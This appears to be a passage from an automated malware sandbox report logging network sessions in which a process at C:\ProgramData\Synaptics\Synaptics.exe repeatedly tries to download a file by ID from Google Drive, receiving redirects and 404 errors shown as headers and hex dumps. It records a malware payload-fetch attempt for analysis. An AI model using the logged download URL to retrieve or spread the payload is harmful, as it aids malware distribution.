                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.649828172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC46BymJCRqKBorebc2NonONRqLKZVtdOnh7C0s5guQ8geNTZrtyaCD-QHzcNnidF8YO
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:27 GMT
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9v7le9JNVb7QErAUUIhmVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                            2024-12-30 10:24:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 4b 61 36 6d 41 47 49 66 33 36 62 48 58 47 72 36 38 63 38 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="VKa6mAGIf36bHXGr68c8Vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                            2024-12-30 10:24:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.649836142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:27 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YrPj8-CoKgUb4zUCSD9BIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.649845142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:28 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5ZLVO5miCYwoO-Snio7p6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.649852142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:28 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-WdDrIByO0OX5aM7f_IcTaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.649853172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC5Eq4TD4ILL790l7uH5J7z2wbhr4Zmgs6GN2XBwQlw4ULxXgrDMJE5CbSQxx2bJnMtY
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:28 GMT
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hU4WgPMxJNCXNXDc4w6K0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                            2024-12-30 10:24:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 51 66 54 7a 79 67 62 45 35 74 46 35 6c 4d 4c 54 78 30 72 78 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="MQfTzygbE5tF5lMLTx0rxQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                            2024-12-30 10:24:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.649858172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                                                                                                            2024-12-30 10:24:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                            X-GUploader-UploadID: AFiumC62pXpF9gPxS4A8wBQVnREIVhhZgjAjf-LpjAHz2m6qfDN1JYdmwcJAmCFIEIo2nkK4
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:29 GMT
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pJ21Rb7YEukVyuqOnJ_5cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Length: 1652
                                                                                                                            Server: UploadServer
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                            Connection: close
                                                                                                                            2024-12-30 10:24:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                            2024-12-30 10:24:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 33 55 31 4d 56 4a 6d 53 70 35 57 61 55 75 4f 79 71 68 61 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="Q3U1MVJmSp5WaUuOyqhadA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                            2024-12-30 10:24:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.649859142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:29 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NhFBnas0-B6DOhMiUNoLhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.649861142.250.186.464435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-30 10:24:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                            Host: docs.google.com
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-30 10:24:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                            Content-Type: application/binary
                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                            Date: Mon, 30 Dec 2024 10:24:29 GMT
                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-j_wzQHjqvHySxusf84xmZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                            Server: ESF
                                                                                                                            Content-Length: 0
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.649862172.217.23.974435048C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            TimestampBytes transferredDirectionData
